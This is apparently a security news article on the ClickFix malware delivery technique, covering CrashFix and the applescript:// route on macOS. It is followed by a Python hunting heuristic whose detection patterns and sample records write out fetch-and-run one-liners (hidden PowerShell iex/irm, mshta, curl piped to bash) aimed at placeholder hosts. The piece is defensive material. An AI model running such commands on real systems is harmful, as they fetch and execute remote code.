And the Winner in Dominant Malware Delivery? ClickFix

Cybercrime’s New Favorite: ClickFix Malware Delivery Technique Dominates Threat Landscape

In just two years, ClickFix has evolved from a niche social engineering tactic to the go-to method for malware attacks. According to research by ReliaQuest, this highly effective technique is no longer an exception, but the rule, dominating initial access and defense-evasion categories in recent months.

ClickFix works by tricking targeted individuals into copying and pasting malicious commands into system dialogs like Windows Terminal. Attackers present victims with error messages or verification prompts that appear legitimate, often through CAPTCHA requests or search engine optimization (SEO) poisoning. This approach bypasses traditional file scanning and email-based defenses, making it a favorite among threat actors.

One notable variant of ClickFix is the “CrashFix” technique, which repeatedly crashes users’ browsers and presents malicious commands as a remedy. Others have weaponized AI models through SEO poisoning, further increasing their effectiveness. ReliaQuest’s analysis reveals that not only has ClickFix seen a significant rise in attacks over the past two years but also an expansion of its reach to macOS systems.

The researchers observed ClickFix activity on macOS for the first time, with attackers deploying the Atomic macOS Stealer, also known as AMOS. ClickFix on macOS is not itself new, but threat actors have shifted tactics, using applescript:// links that automatically open Script Editor and run malicious commands. This change was likely designed to bypass a warning added in macOS 26.4 that appears when users paste commands into the Terminal command-line app.

The shift towards ClickFix as the preferred malware delivery technique has significant implications for security teams. As ClickFix attacks drive nearly 28% of defense-evasion activity through command and file obfuscation techniques, defenders must adapt their strategies to keep pace with threat actors. ReliaQuest’s report highlights a specific ClickFix loader designed to deliver “Deepload” malware, which uses AI-generated obfuscation to hide the malware’s logic.

One notable trend observed by ReliaQuest is that ClickFix activity has shifted from delivery via compromised websites to emailed links instead. While this shift may theoretically favor defenders, as emailed lures must pass through gateways and sandboxing before being clicked, attackers continue to use a variety of effective ClickFix vectors to gain initial access.

The rise of ClickFix highlights the need for security teams to stay vigilant and adapt their defenses continuously. As threat actors increasingly rely on this technique, defenders must prioritize monitoring and response coverage for both Windows and macOS systems. By understanding the tactics and techniques used by attackers, organizations can better protect themselves against these evolving threats.
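A defender-side hunting heuristic over constructed process-creation records that flags both delivery paths described above: a pasted download-and-execute line running under an interactive Windows shell, and the applescript:// Script Editor path on macOS. This is an added example, not code from the article or from ReliaQuest; the telemetry field names and every sample record are assumptions.

```python
import re

# Added hunting heuristic, not ReliaQuest's or Dark Reading's code; field names
# (host/parent/proc/cmdline) and sample records are assumptions. Parents under
# which a pasted ClickFix command typically runs: explorer.exe owns the Run box,
# Windows Terminal/powershell/cmd hold pasted lines, zsh is Terminal.app's shell.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "powershell.exe",
                       "cmd.exe", "zsh"}
DOWNLOAD_EXEC = re.compile(  # fetch-and-run verbs common in pasted one-liners
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|mshta|curl|wget)\b", re.I)
HIDDEN_OR_ENCODED = re.compile(r"-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\b)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")
APPLESCRIPT_URL = re.compile(r"applescript://", re.I)  # Script Editor handler path

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "win-01", "parent": "explorer.exe", "proc": "powershell.exe",
     "cmdline": 'powershell -w hidden -NoP -c "iex (irm https://example.invalid/v)"'},
    {"host": "win-02", "parent": "WindowsTerminal.exe", "proc": "mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha"},
    {"host": "win-03", "parent": "svchost.exe", "proc": "powershell.exe",
     "cmdline": "powershell -File C:\\ProgramData\\inventory.ps1"},  # benign
    {"host": "mac-01", "parent": "launchd", "proc": "Script Editor",
     "cmdline": "Script Editor applescript://constructed.example/lure"},
    {"host": "mac-02", "parent": "zsh", "proc": "bash",
     "cmdline": "bash -c 'curl -fsSL https://example.invalid/x | bash'"},
]

def classify(event):
    """Return the reasons an event looks like ClickFix execution ([] if none)."""
    reasons = []
    cmd = event["cmdline"]
    if APPLESCRIPT_URL.search(cmd):
        reasons.append("applescript:// handler launch (macOS Script Editor path)")
    if event["parent"].lower() in INTERACTIVE_PARENTS:
        if DOWNLOAD_EXEC.search(cmd):
            reasons.append("download-and-execute from interactive parent")
        if HIDDEN_OR_ENCODED.search(cmd):
            reasons.append("hidden window or encoded command")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("remote content piped to shell")
    return reasons

def hunt(events):
    """Return (host, reasons) for every event that trips at least one heuristic."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["host"], reasons))
    return hits
```

The parent-process gate is what keeps scheduled or service-launched PowerShell (win-03) out of the results; tune INTERACTIVE_PARENTS to the shells your fleet actually exposes to users.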
Source: Dark Reading — 2026-07-01